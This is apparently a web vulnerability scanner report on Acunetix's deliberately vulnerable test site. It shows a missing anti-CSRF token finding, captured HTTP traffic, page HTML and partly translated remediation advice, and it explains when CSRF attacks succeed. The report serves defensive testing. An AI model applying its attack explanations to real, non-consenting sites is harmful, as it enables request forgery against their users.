          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        11. GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (341 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9jwc/cRnTJwdNTwN8SPSTaigKqpw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" 